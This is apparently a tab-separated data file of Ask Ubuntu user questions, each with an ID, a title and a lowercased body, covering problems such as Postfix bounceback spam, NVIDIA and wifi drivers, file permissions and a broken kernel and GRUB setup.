282313	potential postfix infection	so i 'm operating an ubuntu vps that uses postfix for sending outgoing mail . i have several email addresses attached to the domain that it hosted on the vps , one of them is say user @ domain.com . the owner of this email address has two personal computers and no more and they 've up until now been using thunderbird to access the email address . a couple of days ago the inbox for user @ domain.com started getting slammed with hundreds and hundreds of bouncebacks an hour , the owner of user @ domain.com deleted her thunderbird entries for those email accounts yesterday to no avail . both computers were shut down last night but the address was still receiving bouncebacks . now initially i thought that because neither computer that had had the account on was turned on , this could be bounceback spam . on closer inspection of the email however , i can see some of them contain lines like : < firstnamelsurname @ bellsouth.net > : delivery temporarily suspended : host gateway-f1.isp.att.net [ 204.127.217.16 ] refused to talk to me : 550-xx.xx.xx.xx blocked by ldap : ou=rblmx , dc=att , dc=net 550 error - blocked for abuse . see http : //att.net/blocks where xx.xx.xx.xx is the ip address of our vpn . this makes me think that it 's something wrong with the postfix server ( as well most likely as an infection on the computers . a full clamscan produced the following : /var/qmail/mailnames/domain.com/user/maildir/.spam/cur/1366042516.m831269p7021v0000000000000025i0000000003c08ed0.vps-domain.com , s=152011:2 , : email.trojan-432 found /usr/share/mailscanner/mailscanner/messagebatch.pm : eicar-test-signature-1 found any ideas how i can track down the issue/solve the problem ? thanks .
282314	unable to run nvidia settings	i am using dell latitude e6510 laptop with ubuntu 12.10 running on it . it has nvidia gt218 nvs 3100m . i am using gnome-fallback mode . my problem is that my laptop was just working fine . however , it was having very high temperatures ( +70 degrees normally ) . so i read about some blogs , where someone advised to install jupiter and nvidia-bumblebee . so i installed these 2 softwares . however , with jupiter , i was unable to change the screen resolution . neither it was able to detect the external monitor . though my laptop was super-cool . it was running at 50-60 degrees . but since this being useless , as i always use an external monitor , i uninstalled both the softwares . also i realised that i do n't have optimus support on my laptop . now i am unable to go back to the initial settings . i am stuck up at 800 x 600 resolution . when i try to run nvidia-settings i get an error message saying : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server i tried to run nvidia-xconfig , but it did n't work . the error remains the same . i tried to find help on internet on lot of forums . i tried to re-install the nvidia packages , but it did n't work . also i tried to use nouveau driver , and then again install nvidia drivers , the problem is still the same . could someone please let me know how do i solve this ?
282316	unable to install skype on ubuntu 10.04	i 'm a 14 year old and absolutely useless at technology . i think its ubuntu 10.04 , and my brother showed me how to do it but he is n't very knowledgeable about my netbook . so it got all the way up to downloading the package then it said could not download all required files and i do n't know what to do ?
282319	how to use sshpass ?	i need to use sshpass to launch a remote command through ssh from a java code . if i manually type in a console : ssh -p 22 user @ ipaddress mplayer '/media/data/myfavouritesong.mp3' works perfectly , but asks for password . so i tried running sshpass : sshpass -p mypass ssh -p 22 user @ ipaddress mplayer '/media/data/myfavouritesong.mp3' sshpass -p mypass ssh -l user @ ipaddress mplayer '/media/data/myfavouritesong.mp3' sshpass -p mypass ssh -t user @ ipaddress mplayer '/media/data/myfavouritesong.mp3' sshpass -p mypass ssh user @ ipaddress echo 'ok' and none of them work .
282322	black screen and flashing underscore while installing off a usb ( 10.10 ) and all other higher versions	downloaded the .iso for 10.10 , ll.10 , 12.04 and 12.10. i have then tried every single one of these versions on a usb ( yes i did create the usb correctly ( i have done this before ) ) but when i restart my mac and hold alt and boot into the liveusb ( which it calls windows ) it loads to a black screen with underscore . the only thing i can do from this is force shutdown . help me please !
282323	xbindkeys press middle mouse button	i 've an mx revolution mouse and i 've mapped the search key as the button 2 so that i can perform middle click . the desired function that i 'm looking for is to be able to use the button to press and hold so i can pan around a 3d model in blender . instead , i am getting a fast alternation of button press and button release which has a slight delay that is causing the panning to be jerky . the line that i use in .xbindkeysrc looks like this : '' echo 'buttonpress 2 buttonrelease 2 ' | xmacroplay :0 '' m:0x0 + c:225 xf86search i suspect the problem is the buttonrelease 2 command . but i 'm not sure . is there anyway i can make the button press and hold command until i release the button on the mouse ?
282332	what is the `` .trash-1000 '' folder and how to delete it ?	can someone tell me what the .trash-1000 folder is and how can i remove/delete it it taking up 275-gig of disk space .
282335	installing drivers from ati website ?	when i click about this computer - > graphics , it shows none . also the fan of my laptop is always on even though cpu usage is below 5 % , hence it is wasting tremendous amount of electricity because the ac adaptor becomes very hot . so i think the drivers for ati radeon hd 7670m graphics are not installed properly . so i downloaded the drivers for linux_64 from ati website . it was a .zip file . after extracting it gave a .run file . when i double clicked the file a window opened containing some text about the driver . from system monitor i found that a process gedit was running at 100 % . it was showing a progress bar which incremented extremely slowly . so i canceled it . so i would like to know how do i install the drivers from the .run file ?
282336	how to select ( & copy ) only a part ( in the middle ) of a linked text ?	example link : the artist john doe shows us his cat ! i want to copy the text `` john doe '' only . it should work while holding alt ( according to this and this answer ) , but for me this would move the whole window instead . am i doing something wrong ? has ubuntu resp . ubuntuâs firefox a different key to allow this ?
282341	trapped in tty ( ? )	i 'm running ubuntu 12.04 and my problem arises when i use ctrl+alt+f # keys in virtualbox ( windows xp guest ) . unfortunately , i have a number of ctrl+alt+f # key shortcuts set up in a windows application , which i am so habituated to using that i find myself doing so despite my best intentions not to , most frequently ctrl+alt+f12 . the screen goes white , rather than presenting a terminal interface , which may ( my research suggests ) be because i have a nvidia graphics card ( i do n't know whether i 'm using the nouveau or nvidia proprietary drivers ) . google and askubuntu tell me these key combiations are intercepted by the host and are taking me to a tty terminal and that i should be able to get back to the gui using ctrl+alt+f7 . i ca n't , however , ctrl+alt+f7 has no effect and in fact the only solution i have found is to do a hard reset . i 'm fairly new to ubuntu , so please bear with me on this . many thanks for any assistance .
282342	script to disable one of the external screens ?	is there a way to write the commands down to a script that would disable one of the external screens in an ubuntu 12.04 virtualbox machine , every time the windows 7 laptop is plugged to the two external screens i have ? i find myself manually disabling the screen through `` system settings '' and i would like to be able to speed up this process by having it written in a script . ideally , the script would listen to the list of connected monitors and kick in every time the second monitor is plugged in . any ideas ?
282343	incremental backup tool that can handle interruptions ?	is there a recommended incremental backup tool that can handle interruptions such as the external usb disk being disconnected in the middle of an update ?
282344	folder on /var/www is forbidden , why ? ( browser is showing forbidden message )	i installed lamp , and created a file named index.html . this file is accessible via browser ( localhost/index.html ) . but when i moved my project folder to /var/www/ , i ca n't browse any file via browser . what to do now ? i tried to change the file permission , but i failed . is it problem for file permission or server problem ? n.b . : i noticed a 403 forbidden message when i tried to browse localhost/netsys/ ( netsys is my project folder ) .
282350	bash : ./install.sh : permission denied installing intel fortran 2011	i am trying to install intel fortran composer 2011 . when i try to command ./install.sh it gives an error : bash : ./install.sh : permission denied i tried some ways to get pass this . tried ; sudo ./install.sh sudo : ./install.sh : command not found trying to remount the installation disk with exec permission ; mount /media/user/ifortran2011 -o remount , exec trying to change install.sh to executable ; chmod +x ./install.sh tried ; su -c 'install.sh' with root : bash : install.sh : command not found with user : password : su : authentication failure and i am sure the password is true . ( if it is the same with my user password ) 5 . i copied the disk into a folder than compressed it into file.tar.gz than extract it with tar xvzf file.tar.gz then tried everthing again . no luck . after i did chmod +x ./install.sh when i look the permissions with : ls -l ./install.sh it still gives : -rw -- -- -- - 1 user user 14758 oct 7 2010 ./install.sh thanks for any help .
282352	exposing touchpad drivers via virtualbox ?	my laptop has a multitouch enabled touchpad which works semi-decently when i try an ubuntu livecd on it , but the windows 7 drivers do n't seem to expose such functionality on windows . i actually tried a 13.04 beta version for this and got it kind of working -- the scrolling is a bit choppy . i run a virtualbox ubuntu 12.04 guest on windows 7 , and i was wondering if it is possible to have the multitouch touchpad working on a fullscreen ubuntu vm session , or if it 's virtualbox who is in charge of policing this kind of thing . any ideas ?
282355	could n't get desktop environment	i 'm totally new to linux . i 've downloaded ubuntu 12.10 , and mounted it using virtual clone drive . i chose demo and full installation and on the next page i chose help me to boot from cd and i clicked finish button . it installed successfully . after reboot i got the option to choose os and i 've chose ubuntu . it 's loaded , but i do n't know what to do after the initramfs and i do n't even know whats is that . what should i do ?
282358	restore keyboard character mapping	i am a new ubuntu user . today my keyboard character mapping has changed all on a sudden . the following keys has been changed . pressing i gives me 5. j- > 1 k- > 2 l- > 3 and some other keys . i have tried to restore to default settings but same result . my keyboard layout is english ( us ) . how to get rid of this weird situation ?
282363	how to install ubuntu 12.04 on my acer aspire zg5 ?	i have never used ubuntu before and i need someone to help me with installation . i have a acer aspire one zg5 and i have no idea about what to do after downloading ubuntu to my device . by the way , i want to use an usb device to install ubuntu . can anyone help me ?
282385	delete file from /etc/profile.d directory	i have made a small script and placed it in a file inside /etc/profile.d directory . since then , i can not login in ubuntu 12.04 , nor in terminal as the normal user . i can only login as root from recovery mode . when i login as root , i try to delete the file but reaction is can not remove file x ... read only file system . i also try to change it in root with nano ( put comments everywhere ) , but i can not save it . is there any way to delete it ?
282387	error : no such schema 'com.canonical.desktop.interface '	ubuntu 12.04.2 lts i want to return a standard ( old ) scroll bar . olga @ olga : ~ $ gsettings set com.canonical.desktop.interface scrollbar-mode normal no such schema 'com.canonical.desktop.interface' can someone please suggest , how do i get the standart scroll bar ? thanks
282393	how to use juju with a vps host ?	is possible to use juju with a vps hosting provider ? i think `` local enviroment '' is the most close option , but i realize that is not possible to have access to it through other enveriments .
282394	desktop switcher like macos or pearos 7 ?	i saw the desktop switcher in pearos like this : can i have the same in my ubuntu 12.04 ? i installed a pearos , but i find no name to this desktop switcher . thank for help .
282404	is there any place on the internet that houses window themes ( as ubuntu tweak calls them ) and gtk themes for ubuntu ?	i 'm wonder if there is like a one-stop place on the internet where i can find all the window themes and gtk themes i could possibly want for ubuntu . i would like these themes to be compatible with 32 bit 12.10 .
282410	ubuntu 12.10 on lenovo z480	i bought a laptop few days ago , lenovo z480 with windows 8 . after some hours i could finally install dualboot windows 8 and ubuntu 12.10 , one thing is that i need to change bios setting each time i want to change os . but the main issue is that my battery last no more than 1 1/2 hours or 2 , and if i watch video less than 1 hour , on the other side using windows 8 the battery last until 4 or 5 hours . installing jupiter there 's no change , my battery dies so fast . would be a linux kernel update in the future to fix this problem ? or i must look for a quick solution ? any ideas ? thanks in advance , if you know what to do , please let me know = ) features : lenovo z480 , ideapad . processor clock speed : 2.5 ghz , intel core i5 , i5-2450m . internal memory : 4 gb , ddr3-sdram , hard disk : 750 gb , graphics nvidia gt 630m
282413	installation problems while using virtualbox on windows xp	i 'm running windows xp . i 've been trying to load ubuntu 12.04 in virtualbox . after first restart , it displays the message : please remove installation media and close the try ( if any ) then press enter then it stops ... how can i continue ? any help will be appreciated . thanks in advance .
282420	how to migrate ubuntu12.04 to lvm without any data loss	the current system is installed on the traditional disk , now i want to migrate it to lvm managed disk , how can i migrate it without any data loss ? i 'm working with vsphere , so i can add and remove disk easily , change system to another virtual disk and rebooting are acceptable . is there someone can help me ? thank you !
282433	/dev/sdb sata-disk does not even show up in syslogs if i plug it in while machine is running	i have ubuntu 12.04 lts on an intel machine : , uname -a gives 3.2.0-38-generic # 61-ubuntu smp [ .. ] x86_64 x86_64 x86_64 gnu/linux the mainboard is a intel s3420gp board . until recently , i can not remember having the following problem , so i think the new behaviour might be from a kernel update ? i have one harddisk /dev/sda which is permanently available and works fine . the machine is used for backup : from time to time , i plug one or two more harddisks in . to do this , the server is equipped with some disk slots where you may pull out or insert a disk tray while the system is running ( can we call that `` hotplugging '' already ? ) . obviously , i take care that i unmount any disk properly before pulling it out . i 've done this a hundred times before and with other machines , too . until some month ago or two , i 've always seen a new device /dev/sdb , /dev/sdc and so on automatically after having plugged in a new disk . the new behaviour is that i 'll neither see new devices , nor do i get any hint in the logs when plugging in a harddisk . how can i tell the machine to recheck for new devices ? a command to be executed would be fine to me . what happened ? as i said , i ca n't remember having had these problems in the last 3 years or so that i use the machine .
282434	how can i access and edit ubuntu files from a windows 7 partition ?	how can i access and edit ubuntu files from a windows 7 partition ? should i start saving my files on windows partition so it becomes more accessible to both partitions or just create a separate partition accessible to both os 's ?
282442	why are n't icon shown in xfce4-panel menu items when loaded into unity ?	in my xubuntu session , icons appear correctly in my xfce4-panel menu applet . if i launch xfce4-panel in my unity session , the icons are missing .
282443	i keep getting `` system program problem detected '' gpu error	i keep getting `` system program problem detected '' /usr/share/apport-gpu-error-intel.py does this mean that my gpu is failing ? ( intel hd graphics ) should i install an aftermarket graphics card to get over the problem ? i am using ubuntu 12.1
282449	wireless with intel centrino advanced-n 6235	i installed ubuntu 12.10 on a samsung series 5 530u3c-a0j and while ethernet works , i am having trouble with wireless lan . it manages to establish a connection to my router without any problems , but that 's it . i can not actually use this connection , e.g . pinging my router leads to 100 % packet loss , while doing the same with ethernet results in 0 % loss . some info about the wireless chip ( from lspci -nnk ) : 01:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088e ] ( rev 24 ) subsystem : intel corporation centrino advanced-n 6235 agn [ 8086:4060 ] kernel driver in use : iwlwifi kernel modules : iwlwifi i 'm not allowed to answer my own question , so here 's an edit : okay , what i did was sudo rmmod iwlwifi sudo modprobe iwlwifi 11n_disable=1 so it seems like n-wlan is the problem . to permanently make this work , i added options iwlwifi 11n_disable=1 to /etc/modprobe.d/iwlwifi.conf as first line after the comments . it seems to work , but can somebody tell me if this was the right way to get it working ? because wireless still needs much more time to initially establish the connection than it took with my old notebook and debian .
282452	how to install clamav on ubuntu 12.10	i am new to ubuntu , so i am not sure how to install clamav on my ubuntu which is version 12.10 .
282457	how to change the default permission when creating a file in ubuntu	in ubuntu , i use a program written by others . this program creates a file on my system and try to read and write it later . but the permission of the file it creates is read-only . how can i change the default permission when creating a file in ubuntu , in home folder . thanks ahead .
282460	how do i find out if an external drive is in active use ( being read/written to ) ?	i have some external drives connected to a power outlet . the outlet is usb switchable , i.e . i can run a program on my pc that physically disconnects the external drives from the power grid . i only use those drives every once in a while for backup . often i forget to turn them off ( though it is really easy with that switchable outlet ) . now what i want to do , is check if they are actively in use . that is , i want to know if larger amounts of data have been written or read from them in , say , the last half hour or so . how would i go about such a task ?
282462	error message with scrambled letters : is this a bug ?	i just got a very weird error message on my ubuntu 12.04 laptop : the only thing i did even close in time before this happened was to eject an sd memory card from the slot . to do so , i first opened file manager and clicked the little `` eject '' button next to the disk label for the card . when the disk was n't in the list anymore , i removed it from the slot . is this a bug , or a problem with my system setup , or with my way of removing the sd card ? obviously there 's a problem somewhere - the least you 'd expect is an error message that can be read ... if it 's a bug , what should i report ( to launchpad , i assume ) ? update : i just got another one of these messages . this time i tried to open a latex source file , but since texworks was n't among the suggested applications i clicked `` open with '' > `` other application ... '' . this is what i got : seriously , what 's going on here ?
282466	unable to run compiled files - bash : ./a.out : permission denied . ( i 've tried chmod )	first of all , there are many questions like this on au . still , none of them solved my problem . i 've compiled my c source using cc test.c , and it did generate a.out file . however when i run it i get this error - bash : ./a.out : permission denied my source is not in the home directory , it is on different fat-32 partition , so i 've mounted the drive in which the code is using the following command - $ udisks -- mount /dev/sda7 -- mount-options umask=022 mounted /org/freedesktop/udisks/devices/sda7 at /media/48e9-fd53 $ cd /media/48e9-fd53/c then i compile my code using cc i 've also tried gcc . but still i get the same error . then i did - chmod +x a.out , still the same problem . also with ( chmod 755 a.out ) and chmod u+x a.out . i 've also tried compiling and executing the program using sudo . i 've also tried - sudo chown sannidhya : sannidhya a.out . i 've tried every thing that i found on au , still could n't get it to work . how can i run .out file ( without moving it to home directory ) ? note - i am using ubuntu 12.04 lts . but a weird thing here is , even after running chmod +x a.out , on running - ls -l a.out , i get- -rw-r -- r -- 1 also when i check the properties of a.out , under permissions tab , there are only 2 modes available read only and read and write .
282468	hp envy 6 overheating	i 've got some overheating issues with my hp envy 6 1170sf . when i start my ultrabook , the minimal heat is 76째c if i do nothing . there is nothing to see in powertop , and jupiter is set to `` power saving '' . i 've tried to install the amd catalyst drivers to use the intel gpu instead of the amd . it seems to work the first time that i restarted the computer , the computer was under 50째c , but at the second restart , startx refused to start . so i 've reinstalled xubuntu many times and tried to reinstall amd , but i 've got the same problem everytime ( with catalyst 13.3 13.1 and 12 ) . so , i would like to know if there is any other way to change the gpu , or reduce the heat .
282470	autoremove iptraf - > thunderbird not working ?	on my ubuntu 12.10 laptop i tried to install iptraf , it did not work ( xterm error ) . sudo apt-get autoremove iptraf started to remove a bunch of systemfiles , ctrl+c did not work and i just closed the terminal as fast as possible . about 20 files where removed . i did not make a screenshot in this situation : ) now thunderbird is not connecting . what can i do if i do n't know what packages have been removed ? any suggestions are very welcome . thank you
282474	how can i use ubuntu to fix my windows os	my windows vista os is not booting up , but ubuntu is working fine for me . i do not have an ubuntu live cd but i do have a usb ... however i do not know how to create a ubuntu live usb . i want to revive my windows os so if there is anyway i can clone the hard drive or fix the os so it will boot properly then i would be very happy . i really hope someone can help me here .
282476	ubuntu stuck at 'pls remove installation media and close tray and press enter	i tried to install ubuntu 12.10 64 bit on my dell inspiron 5520 alongside windows 7 64 bit . it showed up a message like 'remove any installation media and close the tray if any and press enter ' . when i did the above said job windows started up as usual
282478	ubuntu 12.04 boot crash - can not locate sda	my hardware : asus eee pc 901go , ubuntu 12.04 . system has crashed and does n't boot without usb ubutnu 12.04 stick . when trying to load normally ( when choosing ubuntu newest ver . via grub ) i get blank black screen . in all other cases ( if i choose linux restore pae version , does n't matter which ) i get the same response : begin : running /scripts/init-bottom ... mount : mounting /dev on /root/dev failed : no such file or directory done . mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init = bootarg . busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initfrms ) when booting from usb , doing 'try ubuntu ' and then in terminal : ubuntu @ ubuntu : ~ $ ls /dev agpgart network_latency shm tty34 tty9 ttyusb1 autofs network_throughput snapshot tty35 ttyprintk ttyusb2 block null snd tty36 ttys0 uinput bsg oldmem stderr tty37 ttys1 urandom btrfs-control port stdin tty38 ttys10 usbmon0 bus ppp stdout tty39 ttys11 usbmon1 char psaux tty tty4 ttys12 usbmon2 console ptmx tty0 tty40 ttys13 usbmon3 core pts tty1 tty41 ttys14 usbmon4 cpu ram0 tty10 tty42 ttys15 usbmon5 cpu_dma_latency ram1 tty11 tty43 ttys16 v4l disk ram10 tty12 tty44 ttys17 vcs dri ram11 tty13 tty45 ttys18 vcs1 ecryptfs ram12 tty14 tty46 ttys19 vcs2 fb0 ram13 tty15 tty47 ttys2 vcs3 fd ram14 tty16 tty48 ttys20 vcs4 full ram15 tty17 tty49 ttys21 vcs5 fuse ram2 tty18 tty5 ttys22 vcs6 hpet ram3 tty19 tty50 ttys23 vcs7 input ram4 tty2 tty51 ttys24 vcsa kmsg ram5 tty20 tty52 ttys25 vcsa1 log ram6 tty21 tty53 ttys26 vcsa2 loop0 ram7 tty22 tty54 ttys27 vcsa3 loop1 ram8 tty23 tty55 ttys28 vcsa4 loop2 ram9 tty24 tty56 ttys29 vcsa5 loop3 random tty25 tty57 ttys3 vcsa6 loop4 rfkill tty26 tty58 ttys30 vcsa7 loop5 rtc tty27 tty59 ttys31 vga_arbiter loop6 rtc0 tty28 tty6 ttys4 video0 loop7 sda tty29 tty60 ttys5 zero loop-control sdb tty3 tty61 ttys6 mapper sdb1 tty30 tty62 ttys7 mcelog serial tty31 tty63 ttys8 mem sg0 tty32 tty7 ttys9 net sg1 tty33 tty8 ttyusb0 ubuntu @ ubuntu : ~ $ mount /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sdb1 on /cdrom type vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , er > rors=remount-ro ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) ubuntu @ ubuntu : ~ $ ls -al /dev | grep sd brw-rw -- -- 1 root disk 8 , 0 bal 17 17:58 sda brw-rw -- -- 1 root disk 8 , 16 bal 17 17:58 sdb brw-rw -- -- 1 root disk 8 , 17 bal 17 17:58 sdb1 ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sdb : 7862 mb , 7862353920 bytes 242 heads , 62 sectors/track , 1023 cylinders , total 15356160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005f2a2 device boot start end blocks id system /dev/sdb1 * 62 15349091 7674515 c w95 fat32 ( lba ) ubuntu @ ubuntu : ~ $ sudo fdisk -lu disk /dev/sdb : 7862 mb , 7862353920 bytes 242 heads , 62 sectors/track , 1023 cylinders , total 15356160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005f2a2 device boot start end blocks id system /dev/sdb1 * 62 15349091 7674515 c w95 fat32 ( lba ) ubuntu @ ubuntu : ~ $ sudo parted -l model : kingston datatraveler 109 ( scsi ) disk /dev/sdb : 7862mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 31,7kb 7859mb 7859mb primary fat32 boot , lba so this is my usb stick , but no internal ssd . what does that mean ? and contents of /etc/fstab overlays / overlaysfs rw 0 0 tmpfs /tmp tmpfs nosuid , nodev 0 0 i do n't understand how could i mount sda or sda1 manually , is my disk corrupted and i can not access it ? i would like to simply format it and reinstall ubuntu .
282482	unbuntu 12.10 no wifi	hello i am very new to ubuntu and i have 12.10 installed on a dell inpiron 6000 and the wifi is not working at all.. i have read online and i can not find anything that works for me : ( i know that the wifi card that i have in the laptop is a brodcom wireless bcm4318 airforce card . i have found some guides and i was follwing them however i can not get the sudo apt-get install ndiswrapper-utils to work and because that is not working corectly well i was going to put more commands that i found on that website however i just hit the x and now i have no idea what site it was : (
282484	network manager fails to maintain a long-term connection on 802.11x networks	i 'm good with bugs , but i ca n't remain connected to an 802.11x enterprise grade network . it uses tunneled tls authentication , with pap inner authentication . it will connect , but then go and randomly disconnect me and then go insane , and go into a cycle of me needing to re-authenticate with the network . but then it wo n't re-authenticate , until i use the hardware switch to turn off the card , then turn it back on and then it connects , but then disconnects again . i need a little bit of help troubleshooting this , because on the network here , i ca n't use ubuntu , so i 'm stuck on windows until i debug it . how do i go about debugging this ? the card 's an intel wlan card on a dell latitude e6500 . it uses the iwlagn or similar driver . it is not a broadcom card , and the wifi works on every other type of network .
282490	xfapplet for ubuntu 12.04	i 'm trying to get xfapplet to work in my xfce4 install for ubuntu 12.04 . i have tried installing it from the repos . but there is no xfapplet in apt-cache , instead i get this : $ apt-cache search xfapplet xfce4-goodies - enhancements for the xfce4 desktop environment so i make sure that xfce4 goodies is installed , which it is : $ sudo apt-get install xfce4-goodies reading package lists ... done building dependency tree reading state information ... done xfce4-goodies is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 64 not upgraded . ok , so i go into the panel to add a new item and of course it 's not there : for the record i have gnome installed completely ! this is an ubuntu system not xubuntu , when i upgraded from 11 to 12.04 i wanted xfce instead of gnome , but i never uninstalled gnome at all . i can even run gnome classic without any problems and all works , so that should mean all dependencies are there . so then i decided to compile from source : ( link at bottom ) http : //goodies.xfce.org/projects/panel-plugins/xfce4-xfapplet-plugin ok , so on configure i get this : checking for libpanelapplet-2.0 > = 2.0.0 ... not found *** the required package libpanelapplet-2.0 was not found on your system . *** please install libpanelapplet-2.0 ( atleast version 2.0.0 ) or adjust *** the pkg_config_path environment variable if you *** installed the package in a nonstandard prefix so that *** pkg-config is able to find it . of course running apt-cache libpanelapplet i get nothing , but if i run apt-cache libpanel i get : $ apt-cache search libpanel gir1.2-panelapplet-4.0 - gobject introspection for the gnome panel applet library gnome-panel-dbg - gnome panel and library for panel applets - debugging symbols libpanel-applet-4-0 - library for gnome panel applets libpanel-applet-4-dev - library for gnome panel applets - development files libpanel-applet-4-doc - library for gnome panel applets - documentation files so i install 4 : $ sudo apt-get install libpanel-applet-4-dev reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgconf2-dev libgconf2-doc libpanel-applet-4-doc the following new packages will be installed : libgconf2-dev libgconf2-doc libpanel-applet-4-dev libpanel-applet-4-doc 0 upgraded , 4 newly installed , 0 to remove and 64 not upgraded . need to get 326 kb of archives . after this operation , 2,906 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //gt.archive.ubuntu.com/ubuntu/ precise/main libgconf2-dev i386 3.2.5-0ubuntu2 [ 118 kb ] get:2 http : //gt.archive.ubuntu.com/ubuntu/ precise/main libgconf2-doc all 3.2.5-0ubuntu2 [ 101 kb ] get:3 http : //gt.archive.ubuntu.com/ubuntu/ precise-updates/universe libpanel-applet-4-dev i386 1:3.4.1-0ubuntu1.1 [ 11.7 kb ] get:4 http : //gt.archive.ubuntu.com/ubuntu/ precise-updates/universe libpanel-applet-4-doc all 1:3.4.1-0ubuntu1.1 [ 96.3 kb ] fetched 326 kb in 1s ( 210 kb/s ) selecting previously unselected package libgconf2-dev . ( reading database ... 386366 files and directories currently installed . ) unpacking libgconf2-dev ( from ... /libgconf2-dev_3.2.5-0ubuntu2_i386.deb ) ... selecting previously unselected package libgconf2-doc . unpacking libgconf2-doc ( from ... /libgconf2-doc_3.2.5-0ubuntu2_all.deb ) ... selecting previously unselected package libpanel-applet-4-dev . unpacking libpanel-applet-4-dev ( from ... /libpanel-applet-4-dev_1 % 3a3.4.1-0ubuntu1.1_i386.deb ) ... selecting previously unselected package libpanel-applet-4-doc . unpacking libpanel-applet-4-doc ( from ... /libpanel-applet-4-doc_1 % 3a3.4.1-0ubuntu1.1_all.deb ) ... setting up libgconf2-dev ( 3.2.5-0ubuntu2 ) ... setting up libgconf2-doc ( 3.2.5-0ubuntu2 ) ... setting up libpanel-applet-4-dev ( 1:3.4.1-0ubuntu1.1 ) ... setting up libpanel-applet-4-doc ( 1:3.4.1-0ubuntu1.1 ) ... great , the configure still complains the exact same message of not found version 2 . i have version 4 installed and running : $ whereis libpanel-applet-4 libpanel-applet-4 : /usr/lib/libpanel-applet-4.so any ideas ? i am running version 4.8 of xfce4 .
282496	how do you get http : // to load automatically in a web browser ?	i have created a web browser in glade / python and what i 'm wanting to do is get http : // to load automatically . just because at the moment whenever i go to a website i have to type the http : // and if i do not type this then the website does not open and i get a error message . could anyone please help me out with the code or a way to do this please .
282497	deleted the kernel and unable to recover it	i have accidentally deleted the kernel that i was using ( linux-image-3.5.0-27-generic ) and after rebooting the system it did n't boot anymore . fortunately i still have some of the old kernels ( linux-image-3.5.0-26-generic ) there and can boot from them . so i read a little about it and re-installed the linux-image-generic , linux-image-extra-3.5.0-27-generic and linux-image-3.5.0-27-generic , and finally updated grub using sudo update-grub . everything seems to be done correctly and my grub menu list looks like title ubuntu 12.10 , kernel 3.5.0-27-generic uuid 1e06333b-052f-4dc6-905e-d4617d6436e0 kernel /vmlinuz-3.5.0-27-generic root=uuid=8a9c42e0-a5a2-493f-ac7c-f697567e7c8b ro quiet splash initrd /initrd.img-3.5.0-27-generic title ubuntu 12.10 , kernel 3.5.0-27-generic ( recovery mode ) uuid 1e06333b-052f-4dc6-905e-d4617d6436e0 kernel /vmlinuz-3.5.0-27-generic root=uuid=8a9c42e0-a5a2-493f-ac7c-f697567e7c8b ro single initrd /initrd.img-3.5.0-27-generic title ubuntu 12.10 , kernel 3.5.0-26-generic uuid 1e06333b-052f-4dc6-905e-d4617d6436e0 kernel /vmlinuz-3.5.0-26-generic root=uuid=8a9c42e0-a5a2-493f-ac7c-f697567e7c8b ro quiet splash initrd /initrd.img-3.5.0-26-generic title ubuntu 12.10 , kernel 3.5.0-26-generic ( recovery mode ) uuid 1e06333b-052f-4dc6-905e-d4617d6436e0 kernel /vmlinuz-3.5.0-26-generic root=uuid=8a9c42e0-a5a2-493f-ac7c-f697567e7c8b ro single initrd /initrd.img-3.5.0-26-generic title ubuntu 12.10 , kernel 3.5.0-17-generic uuid 1e06333b-052f-4dc6-905e-d4617d6436e0 kernel /vmlinuz-3.5.0-17-generic root=uuid=8a9c42e0-a5a2-493f-ac7c-f697567e7c8b ro quiet splash initrd /initrd.img-3.5.0-17-generic title ubuntu 12.10 , kernel 3.5.0-17-generic ( recovery mode ) uuid 1e06333b-052f-4dc6-905e-d4617d6436e0 kernel /vmlinuz-3.5.0-17-generic root=uuid=8a9c42e0-a5a2-493f-ac7c-f697567e7c8b ro single initrd /initrd.img-3.5.0-17-generic title ubuntu 12.10 , memtest86+ uuid 1e06333b-052f-4dc6-905e-d4617d6436e0 kernel /memtest86+.bin but when i reboot the computer the grub menu looks like the old one , i.e . has the previous versions that i have deleted still listed , and also when i try to boot to the latest kernel ( 3.5.0.27 ) it halts and never boots . is there something that i 've done wrong or are there some more things i need to do ?
